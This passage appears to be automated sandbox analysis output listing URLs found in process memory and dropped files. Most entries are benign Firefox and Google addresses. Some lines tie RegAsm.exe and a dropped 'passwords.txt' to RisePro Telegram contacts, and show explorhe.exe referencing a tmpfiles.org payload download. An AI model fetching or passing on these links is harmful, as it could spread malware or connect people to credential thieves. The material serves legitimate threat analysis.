Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/marc/paaskey.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/marc/passkey_challenge.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/marc/passkey_enrollment.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/marc/passkey_enrollment_cross_device.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/marc/passkey_enrollment_error.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/marc/passkey_enrollment_reauth.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/marc/passkey_success.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/marc/passkeyerror.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/marc/screenlock.png
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/marc/security_key_ipad.gif
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/marc/security_key_iphone.gif
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/marc/security_key_iphone_nfc.gif
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/marc/security_key_iphone_usb.gif
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/marc/security_key_phone.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/marc/security_keys.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/marc/success_checkmark_2.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/ui/loading_spinner_gm.gif
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/ui/progress_spinner_color_20dp_4x.gif
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/accounts/ui/success-gm-default_2x.png
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/images/hpp/shield_security_checkup_green_2x_web_96dp.png
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/kids/images/minormodeexit/intro.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/kids/images/onboarding/get_family_link_1.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/kids/images/onboarding/kid_watch_installing_family_link_1.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/kids/images/onboarding/kid_watch_set_up_location_sharing_1.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/kids/images/onboarding/kid_watch_set_up_parental_controls_1.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/kids/images/onboarding/kid_watch_set_up_school_time_1.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/kids/images/onboarding/location_sharing_enabled_1.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/kids/images/onboarding/parent_sign_in_prologue_0.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/kids/images/onboarding/set_up_contacts_1.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/kids/images/ulp_appblock/kid_setup_parent_escalation.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/kids/images/ulp_appblock/send_email_confirmation.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/kids/images/ulp_appblock/success_sent_email.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/kids/images/ulpupgrade/kidprofileupgrade_all_set.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/all_set.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/almost_done_kids_space_v2.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/devices_connected_tablet_v2.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/devices_connected_v2.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/hand_over_device.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/linking_accounts_v2.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/manage_parental_controls_email_v2.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/manage_parental_controls_v2.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/open_family_link_v2.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/parents_help.svg
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/set_up_kids_space.png
Source: chromecache_973.22.dr	String found in binary or memory: https://ssl.gstatic.com/kids/onboarding/illustrations/supervision_ready_v2.svg
Source: firefox.exe, 00000033.00000003.2640984970.0000026F4E9A7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2640984970.0000026F4E9CD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: firefox.exe, 00000033.00000003.2992813819.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993652957.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/youtube/bin/answer.py?answer=140536
Source: places.sqlite-wal.51.dr	String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-user-removal
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: firefox.exe, 00000033.00000003.2947953057.0000026F5AD1F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=panel-def
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
Source: firefox.exe, 00000033.00000003.2635008926.0000026F51A60000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
Source: firefox.exe, 00000031.00000002.4763336635.0000020344D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000033.00000003.2827138310.0000026F4EC34000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2540660558.0000026F4FE41000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2638535851.0000026F4FE41000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2642685463.0000026F4BC38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: favicons.sqlite-wal.51.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 00000033.00000003.2632290478.0000026F525C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windows
Source: firefox.exe, 00000031.00000002.4753403845.0000020344896000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsMediaPlatformDecoderNotFound
Source: firefox.exe, 00000031.00000002.4753403845.0000020344896000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsMediaWMFNeeded
Source: firefox.exe, 00000031.00000002.4775596956.00000203450A0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsThe
Source: firefox.exe, 00000031.00000002.4775596956.00000203450A0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsUse
Source: firefox.exe, 00000033.00000003.2938677557.0000026F4C32F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2924495015.0000026F4C333000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2944906514.0000026F4C32F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2936440403.0000026F4C31B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2942901828.0000026F4C32F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
Source: favicons.sqlite-wal.51.dr	String found in binary or memory: https://support.mozilla.org/products/firefox
Source: places.sqlite-wal.51.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.
Source: places.sqlite-wal.51.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: RegAsm.exe, 00000002.00000002.2596470514.000000000152A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2596470514.00000000015D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/RiseProSUPPORT
Source: RegAsm.exe, 00000002.00000002.2596470514.000000000157F000.00000004.00000020.00020000.00000000.sdmp, passwords.txt.2.dr	String found in binary or memory: https://t.me/risepro_bot
Source: RegAsm.exe, 00000002.00000002.2596470514.000000000157F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/risepro_bot5
Source: RegAsm.exe, 00000002.00000002.2596470514.000000000157F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/risepro_boto
Source: RegAsm.exe, 00000002.00000002.2596470514.000000000157F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/risepro_botrisepro
Source: firefox.exe, 00000033.00000003.2936611786.0000026F4A87F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tc39.github.io/ecma262/#sec-typeof-operator
Source: explorhe.exe, 0000002E.00000002.4711406923.000000000141A000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000003.3962232462.000000000141A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tmpfiles.org/.
Source: explorhe.exe, 0000002E.00000002.4711406923.000000000141A000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000003.3962232462.000000000141A000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000002.4712262612.000000000148C000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000003.3963311894.000000000148C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tmpfiles.org/dl/3900221/setuppowergrepdemo.exe
Source: explorhe.exe, 0000002E.00000002.4711406923.000000000141A000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000003.3962232462.000000000141A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tmpfiles.org/dl/3900221/setuppowergrepdemo.exe3456789
Source: explorhe.exe, 0000002E.00000002.4711406923.000000000141A000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000003.3962232462.000000000141A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tmpfiles.org/dl/3900221/setuppowergrepdemo.exeG
Source: explorhe.exe, 0000002E.00000002.4711406923.000000000141A000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000003.3962232462.000000000141A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tmpfiles.org/dl/3900221/setuppowergrepdemo.exed5aba4
Source: explorhe.exe, 0000002E.00000002.4712262612.000000000148C000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000003.3963311894.000000000148C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tmpfiles.org/dl/3900221/setuppowergrepdemo.exey
Source: explorhe.exe, 0000002E.00000002.4711406923.000000000141A000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000003.3962232462.000000000141A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tmpfiles.org/o
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
Source: firefox.exe, 00000033.00000003.2632290478.0000026F525C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
Source: firefox.exe, 00000033.00000003.2632290478.0000026F525C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
Source: firefox.exe, 00000033.00000003.2632290478.0000026F525C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
Source: firefox.exe, 00000033.00000003.2632290478.0000026F525C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://topsites.services.mozilla.com/cid/
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 00000033.00000003.2675923428.0000026F4C71C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2641907380.0000026F4CBDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2820309508.0000026F4CBDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2815640094.0000026F4CBDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2674562682.0000026F4CBDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 00000033.00000003.2675923428.0000026F4C799000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2677633982.0000026F4BC38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2642685463.0000026F4BC38000.00000004.00000800.00020000.00000000.sdmp, D0F48A0632B6C451791F4257697E861961F06A6F.51.dr	String found in binary or memory: https://twitter.com/
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://webcompat.com/issues/new
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: firefox.exe, 00000033.00000003.2936611786.0000026F4A87F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2933058687.0000026F4A87F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
Source: D0F48A0632B6C451791F4257697E861961F06A6F.51.dr	String found in binary or memory: https://www.amazon.com/
Source: firefox.exe, 00000033.00000003.2795566806.0000026F49DB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2675923428.0000026F4C799000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2977225357.0000026F49DB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2688000475.0000026F49DB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2677633982.0000026F4BC38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2642685463.0000026F4BC38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: firefox.exe, 00000033.00000003.2509868422.0000026F4D00E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2512730909.0000026F4D051000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2508170933.0000026F4E500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2510769501.0000026F4D030000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 00000033.00000003.2821250814.0000026F4CB8B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2832343051.0000026F50500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2989992367.0000026F4E4F4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2989697113.0000026F4E4F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: QdX9ITDLyCRBWeb Data.2.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: firefox.exe, 00000033.00000003.2943449171.0000026F56455000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 00000033.00000003.2509868422.0000026F4D00E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2512730909.0000026F4D051000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2508170933.0000026F4E500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2510769501.0000026F4D030000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/get/videoqualityreport/
Source: firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/get/videoqualityreport/?v=
Source: DC990C2E9B8378070C100B26A893DB305F84C5FA.51.dr	String found in binary or memory: https://www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png
Source: Web Data.36.dr, QdX9ITDLyCRBWeb Data.2.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chromecache_973.22.dr	String found in binary or memory: https://www.google.com/intl/
Source: chromecache_973.22.dr	String found in binary or memory: https://www.google.com/log?format=json&hasfast=true
Source: firefox.exe, 00000033.00000003.2509868422.0000026F4D00E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2512730909.0000026F4D051000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2508170933.0000026F4E500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2510769501.0000026F4D030000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 00000033.00000003.2993102927.0000026F5DB8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleadservices.com/pagead/aclk?sa=L&ai=C
Source: firefox.exe, 00000033.00000003.2992813819.0000026F5DC83000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2992813819.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993652957.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleadservices.com/pagead/aclk?sa=L&ai=C3OQpfbUyZYWKL_Ken8RMFbClwAyRha6dc6fw7oP7EbaQHx
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: firefox.exe, 00000033.00000003.2993278709.0000026F5DDE3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2992190171.0000026F5DDE3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: chromecache_973.22.dr	String found in binary or memory: https://www.gstatic.com/accounts/speedbump/authzen_optin_illustration.gif
Source: firefox.exe, 00000033.00000003.2992813819.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993652957.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/external_hosted/lottie/lottie_light.js
Source: chromecache_973.22.dr	String found in binary or memory: https://www.gstatic.com/images/branding/product/2x/chrome_48dp.png
Source: chromecache_973.22.dr	String found in binary or memory: https://www.gstatic.com/images/branding/product/2x/googleg_48dp.png
Source: chromecache_973.22.dr	String found in binary or memory: https://www.gstatic.com/images/branding/product/2x/gsa_48dp.png
Source: chromecache_973.22.dr	String found in binary or memory: https://www.gstatic.com/images/branding/product/2x/play_prism_48dp.png
Source: chromecache_973.22.dr	String found in binary or memory: https://www.gstatic.com/images/branding/product/2x/youtube_48dp.png
Source: firefox.exe, 00000033.00000003.2994692431.0000026F5DBF3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/youtube/img/annotations/youtube.png
Source: firefox.exe, 00000033.00000003.2994582235.0000026F5DD3B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2992610961.0000026F5DD0B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2992520338.0000026F5DD3B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995940891.0000026F5DB17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/youtube/img/icons/web/
Source: D550D57BCFA88C4195E78095A742FAC7693FC54F.51.dr	String found in binary or memory: https://www.gstatic.com/youtube/img/icons/web/youtube_fill/offline_download/v1/24px.svg
Source: B41E3D0BA051DAFDC3F262CC45C5AE9165BC9508.51.dr	String found in binary or memory: https://www.gstatic.com/youtube/img/icons/web/youtube_fill/play-arrow/v1/24px.svg
Source: A988D8F5B0BF56AA1942EC62AFDF51C05C82139B.51.dr	String found in binary or memory: https://www.gstatic.com/youtube/img/icons/web/youtube_fill/shorts-dislike/v2/32px.svg
Source: AF10D6A6EDDDEAF586DD225969745155C8322254.51.dr	String found in binary or memory: https://www.gstatic.com/youtube/img/icons/web/youtube_outline/refresh/v1/24px.svg
Source: firefox.exe, 00000033.00000003.2992813819.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993652957.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/youtube/img/lottie/animated_like_icon/animated_like_icon_v2_dark.json
Source: firefox.exe, 00000033.00000003.2992813819.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993652957.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/youtube/img/lottie/animated_like_icon/animated_like_icon_v2_light.json
Source: firefox.exe, 00000033.00000003.2996095013.0000026F5D9EB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2994582235.0000026F5DD3B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2992986328.0000026F5DBBB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2992520338.0000026F5DD3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/youtube/img/lottie/playables_loading_animation/
Source: firefox.exe, 00000033.00000003.2992813819.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993652957.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/youtube/img/lottie/subscribe_action/subscribe_action_bell_icon_dark.json
Source: firefox.exe, 00000033.00000003.2992813819.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993652957.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/youtube/img/lottie/subscribe_action/subscribe_action_bell_icon_light.json
Source: firefox.exe, 00000033.00000003.2992813819.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993652957.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/youtube/img/surveys/lottie/animated_smileys/dark_mode/face_happy.json
Source: firefox.exe, 00000033.00000003.2992813819.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993652957.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/youtube/img/surveys/lottie/animated_smileys/dark_mode/face_meh.json
Source: firefox.exe, 00000033.00000003.2992813819.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993652957.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/youtube/img/surveys/lottie/animated_smileys/dark_mode/face_sad.json
Source: firefox.exe, 00000033.00000003.2992813819.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993652957.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/youtube/img/surveys/lottie/animated_smileys/dark_mode/face_unhappy.json
Source: firefox.exe, 00000033.00000003.2992813819.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993652957.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/youtube/img/surveys/lottie/animated_smileys/dark_mode/face_very_happy.json
Source: firefox.exe, 00000033.00000003.2992813819.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993652957.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/youtube/img/surveys/lottie/animated_smileys/light_mode/face_happy.json
